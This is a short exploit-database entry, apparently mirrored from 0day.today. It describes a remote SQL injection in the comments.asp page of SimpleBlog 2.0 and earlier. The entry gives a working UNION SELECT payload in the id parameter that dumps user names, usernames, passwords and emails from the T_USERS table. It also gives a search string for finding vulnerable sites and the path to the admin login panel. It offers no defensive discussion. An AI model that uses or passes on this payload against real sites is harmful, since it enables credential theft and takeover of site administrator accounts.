id: 726
date: 08/19/2006
title: SimpleBlog <= 2.0 (comments.asp) Remote SQL Injection Vulnerability
author: Chironex Fleckeri
cves: 

===================================================================
SimpleBlog <= 2.0 (comments.asp) Remote SQL Injection Vulnerability
===================================================================




################################################################################
##                                                                            ##

##  SimpleBlog 2.0 <= "comments.asp" SQL Injection Exploit                    ##

##  - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -       ##

##  Credit by        |  Chironex Fleckeri                                     ##

##  Googledork       |  Powered By SimpleBlog 2.0                             ##

##  - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -       ##

##                                                                            ##
################################################################################

############################################################################################################################################################
#Usage : http://www.target.com/path/comments.asp?id=-1 UNION SELECT ID,uFULLNAME,uUSERNAME,uPASSWORD,uEMAIL,uDATECREATED,null,null FROM T_USERS WHERE id=1 #
############################################################################################################################################################

###########################################################
#Admin Panel : http://www.target.com/path/admin/login.asp #
###########################################################



#  0day.today [2023-03-27]  #